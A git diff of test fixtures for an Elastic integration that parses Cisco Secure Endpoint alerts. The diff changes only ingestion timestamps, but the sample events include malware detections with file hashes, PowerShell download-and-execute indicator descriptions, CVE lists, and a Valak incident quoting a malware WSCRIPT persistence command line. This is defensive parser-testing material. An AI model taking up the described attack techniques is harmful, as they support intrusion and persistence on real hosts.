Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Exploit_Prevention_Audit\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"d2:78:15:4a:f4:a2\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -3106,7 +3106,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222602600Z", + "ingested": "2021-12-14T14:40:34.011400440Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.GenericKD:Malwaregen.21do.1201\",\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"OLD.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\Desktop\\\\OLD.exe\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\",\"sha1\":\"26de43cc558a4e0e60eddd4dc9321bcb5a0a181c\",\"md5\":\"cfdd16225e67471f5ef54cab9b3a5558\"},\"parent\":{\"process_id\":2632,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"d5bc504277172be5c54b60ad5c13209dc1f729131def084de3ec8c72e54c58ef\",\"sha1\":\"84123a3decdaa217e3588a1de59fe6cee1998004\",\"md5\":\"38ae1b3c38faef56fe4907922f0385ba\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3184,7 +3184,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222606800Z", + "ingested": "2021-12-14T14:40:34.011400837Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525520937264087000,\"timestamp\":1608875349,\"timestamp_nanoseconds\":661000000,\"date\":\"2020-12-25T05:49:09+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525520937264087041\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"edb1ff2521fb4bf748111f92786d260d40407a2e8463dcd24bb09f908ee13eb9\"}}}}", "code": "553648143", "kind": "alert", @@ -3281,7 +3281,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222611300Z", + "ingested": "2021-12-14T14:40:34.011401260Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"Auto.F2863A.211556.in02\",\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"twhy.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Roaming\\\\twhy.exe\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\",\"sha1\":\"7d9518ea3f98d037745352b23861fab05d3777dc\",\"md5\":\"c624d61b8f076c3ef05f74eeb96c8954\"},\"parent\":{\"process_id\":4868,\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\",\"sha1\":\"04c5d2b4da9a0f3fa8a45702d4256cee42d8c48d\",\"md5\":\"92f44e405db16ac55d97e3bfe3b132fa\"}}}}}", "code": "1090519054", "kind": "alert", @@ -3359,7 +3359,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222616500Z", + "ingested": "2021-12-14T14:40:34.011401663Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525516191325225000,\"timestamp\":1608874244,\"timestamp_nanoseconds\":500000000,\"date\":\"2020-12-25T05:30:44+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6525516191325224961\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"f2863a775c7faa85aefa3814530d9356ff700ae8bf534584652c2b4b720ee117\"}}}}", "code": "553648143", "kind": "alert", @@ -3438,7 +3438,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:29.222621400Z", + "ingested": "2021-12-14T14:40:34.011402063Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132516139000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":516130000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"PowerShell is a Windows utility that allows access to many Microsoft APIs within a shell environment. In this case, a script attempted to download a file or script to the local system and then execute it. Malware authors may use this to download items, rename them, execute and delete them with a single command.\",\"short_description\":\"W32.PowershellDownloadedExecutable.ioc\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3525,7 +3525,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:29.222629400Z", + "ingested": "2021-12-14T14:40:34.011402483Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":1519340132474871000,\"timestamp\":1608874241,\"timestamp_nanoseconds\":474861000,\"date\":\"2020-12-25T05:30:41+00:00\",\"event_type\":\"Cloud IOC\",\"event_type_id\":1107296274,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"start_timestamp\":1608874241,\"start_date\":\"2020-12-25T05:30:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"cloud_ioc\":{\"description\":\"Microsoft Word launched PowerShell. This is indicative of multiple dropper variants that make use of Visual Basic Application macros to perform nefarious activities, such as downloading and executing malicious executables.\",\"short_description\":\"W32.WinWord.Powershell\"},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"powershell.exe\",\"file_path\":\"/C:/Windows/SysWOW64/WindowsPowerShell/v1.0/powershell.exe\",\"identity\":{\"sha256\":\"6c05e11399b7e3c8ed31bae72014cf249c144a8f4a2c54a758eb2e6fad47aec7\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"664e83900e42179cfea99edb71abaf00b35e558da8d5f2e35004b2a623d5b5f7\"}}}}}", "code": "1107296274", "kind": "alert", @@ -3611,7 +3611,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222635300Z", + "ingested": "2021-12-14T14:40:34.011402898Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384389977,\"timestamp\":1608872547,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:27+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872547,\"start_date\":\"2020-12-25T05:02:27+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"d1bea74ac9d85b3dcd4abc1af42af6c37b9349defc8e6577993611b773f56ca0\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", @@ -3711,7 +3711,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222639700Z", + "ingested": "2021-12-14T14:40:34.011403330Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193384371995,\"timestamp\":1608872546,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T05:02:26+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608872546,\"start_date\":\"2020-12-25T05:02:26+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"mshtml.dll\",\"identity\":{\"sha256\":\"1dc5d15a26a79bb46519952a60b15aa4acb36f6ce3247ebf50df9c157bc4fcf4\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Internet Explorer\",\"version\":\"11\",\"cve\":\"CVE-2018-0762\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0762\"},{\"cve\":\"CVE-2018-0772\",\"score\":\"7.6\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0772\"}]}}", "code": "1107296279", "kind": "alert", @@ -3811,7 +3811,7 @@ }, "event": { "severity": 1, - "ingested": "2021-12-09T13:35:29.222643900Z", + "ingested": "2021-12-14T14:40:34.011403732Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":15193366641599,\"timestamp\":1608870773,\"timestamp_nanoseconds\":0,\"date\":\"2020-12-25T04:32:53+00:00\",\"event_type\":\"Vulnerable Application Detected\",\"event_type_id\":1107296279,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Low\",\"start_timestamp\":1608870773,\"start_date\":\"2020-12-25T04:32:53+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Clean\",\"file_name\":\"OUTLOOK.EXE\",\"identity\":{\"sha256\":\"465f398ae8e3c32395eb7c04bc8cd24595068e6a127e243bed3e9b4931556bfc\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"71854d2c40664493e05c0a7e4f0c7cc74ada1a63eec1d4fe32350f6af8728243\"}}},\"vulnerabilities\":[{\"name\":\"Microsoft Office\",\"version\":\"2016\",\"cve\":\"CVE-2017-0106\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-0106\"},{\"cve\":\"CVE-2017-11774\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-11774\"},{\"cve\":\"CVE-2017-8506\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8506\"},{\"cve\":\"CVE-2017-8507\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8507\"},{\"cve\":\"CVE-2017-8571\",\"score\":\"6.8\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8571\"},{\"cve\":\"CVE-2017-8663\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-8663\"},{\"cve\":\"CVE-2018-0791\",\"score\":\"9.3\",\"url\":\"https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-0791\"}]}}", "code": "1107296279", "kind": "alert", @@ -3927,7 +3927,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222647400Z", + "ingested": "2021-12-14T14:40:34.011404141Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525498672153625000,\"timestamp\":1608870165,\"timestamp_nanoseconds\":878000000,\"date\":\"2020-12-25T04:22:45+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", @@ -3983,7 +3983,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222651900Z", + "ingested": "2021-12-14T14:40:34.011404547Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494703603843000,\"timestamp\":1608869241,\"timestamp_nanoseconds\":928000000,\"date\":\"2020-12-25T04:07:21+00:00\",\"event_type\":\"Scan Completed, No Detections\",\"event_type_id\":554696715,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\",\"clean\":true,\"scanned_files\":2872,\"scanned_processes\":49,\"scanned_paths\":0,\"malicious_detections\":0}}}", "code": "554696715", "kind": "alert", @@ -4047,7 +4047,7 @@ }, "event": { "severity": 0, - "ingested": "2021-12-09T13:35:29.222675100Z", + "ingested": "2021-12-14T14:40:34.011404961Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6525494527510184000,\"timestamp\":1608869200,\"timestamp_nanoseconds\":537000000,\"date\":\"2020-12-25T04:06:40+00:00\",\"event_type\":\"Scan Started\",\"event_type_id\":554696714,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Intel\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e6:44:a0:56:f3:9a\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"scan\":{\"description\":\"Flash Scan\"}}}", "code": "554696714", "kind": "alert", diff --git a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json index cd5c1bd78da..234e0e34763 100644 --- a/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json +++ b/packages/cisco_secure_endpoint/data_stream/event/_dev/test/pipeline/test-cisco-amp2.log-expected.json @@ -51,7 +51,7 @@ "event": { "severity": 4, "action": "SecureX Threat Hunting Incident", - "ingested": "2021-12-09T13:35:32.897992800Z", + "ingested": "2021-12-14T14:40:37.784976295Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"timestamp\":1610711992,\"timestamp_nanoseconds\":155518026,\"date\":\"2021-01-15T11:59:52+00:00\",\"event_type\":\"SecureX Threat Hunting Incident\",\"event_type_id\":1107296344,\"connector_guid\":\"test_connector_guid\",\"severity\":\"Critical\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Threat_Hunting\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"87:c2:d9:a2:8c:74\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"threat_hunting\":{\"incident_report_guid\":\"6e5292d5-248c-49dc-839d-201bcba64562\",\"incident_hunt_guid\":\"4bdbaf20-020f-4bb5-9da9-585da0e07817\",\"incident_title\":\"Valak Variant\",\"incident_summary\":\"The host Demo_Threat_Hunting is compromised by a Valak malware variant. Valak is a multi-stage malware attack that uses screen capture, reconnaissance, geolocation, and fileless execution techniques to infiltrate and exfiltrate sensitive information. Based on the event details listed and the techniques used, we recommend the host in question be investigated further.\",\"incident_remediation\":\"We recommend the following:\\r\\n\\r\\n- Isolation of the affected hosts from the network\\r\\n- Perform forensic investigation\\r\\n - Review all activity performed by the user\\r\\n - Upload any suspicious files to ThreatGrid for analysis\\r\\n - Search the registry for data \\\"var config = ( COMMAND_C2\\\" and remove the key\\r\\n - Review scheduled tasks and cancel any involving the execution of WSCRIPT.EXE //E:jscript C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone lqjsxokgowhbxjaetyrifnbigtcxmuj eimljujnv\\r\\n - Remove the Alternate Data Stream file located C:\\\\Users\\\\Public\\\\PowerManagerSpm.jar:LocalZone.\\r\\n- If possible, reimage the affected system to prevent potential unknown persistence methods.\",\"incident_id\":416,\"tactics\":[{\"name\":\"Defense Evasion\",\"description\":\"\u003cp\u003eThe adversary is trying to avoid being detected.\u003c/p\u003e\\n\\n\u003cp\u003eDefense Evasion consists of techniques that adversaries use to avoid detection throughout their compromise. Techniques used for defense evasion include uninstalling/disabling security software or obfuscating/encrypting data and scripts. Adversaries also leverage and abuse trusted processes to hide and masquerade their malware. Other tactics’ techniques are cross-listed here when those techniques include the added benefit of subverting defenses.\u003c/p\u003e\\n\",\"external_id\":\"TA0005\",\"mitre_name\":\"tactic\",\"mitre_url\":\"https://attack.mitre.org/tactics/TA0005\"}],\"techniques\":[{\"name\":\"Data from Local System\",\"description\":\"\u003cp\u003eAdversaries may search local system sources, such as file systems or local databases, to find files of interest and sensitive data prior to Exfiltration.\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may do this using a \u003ca href=\\\"https://attack.mitre.org/techniques/T1059\\\"\u003eCommand and Scripting Interpreter\u003c/a\u003e, such as \u003ca href=\\\"https://attack.mitre.org/software/S0106\\\"\u003ecmd\u003c/a\u003e, which has functionality to interact with the file system to gather information. Some adversaries may also use \u003ca href=\\\"https://attack.mitre.org/techniques/T1119\\\"\u003eAutomated Collection\u003c/a\u003e on the local system.\u003c/p\u003e\\n\",\"external_id\":\"T1005\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1005\",\"tactics_names\":\"Collection\",\"platforms\":\"Linux, macOS, Windows\",\"system_requirements\":\"Privileges to access certain files and directories\",\"permissions\":\"\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters\"},{\"name\":\"Scheduled Task/Job\",\"description\":\"\u003cp\u003eAdversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically requires being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)\u003c/p\u003e\\n\\n\u003cp\u003eAdversaries may use task scheduling to execute programs at system startup or on a scheduled basis for persistence. These mechanisms can also be abused to run a process under the context of a specified account (such as one with elevated permissions/privileges).\u003c/p\u003e\\n\",\"external_id\":\"T1053\",\"mitre_name\":\"technique\",\"mitre_url\":\"https://attack.mitre.org/techniques/T1053\",\"tactics_names\":\"Execution, Persistence, Privilege Escalation\",\"platforms\":\"Windows, Linux, macOS\",\"system_requirements\":null,\"permissions\":\"Administrator, SYSTEM, User\",\"data_sources\":\"File monitoring, Process monitoring, Process command-line parameters, Windows event logs\"},{\"name\":\"Scripting\",\"description\":\"\u003cp\u003e\u003cstrong\u003eThis technique 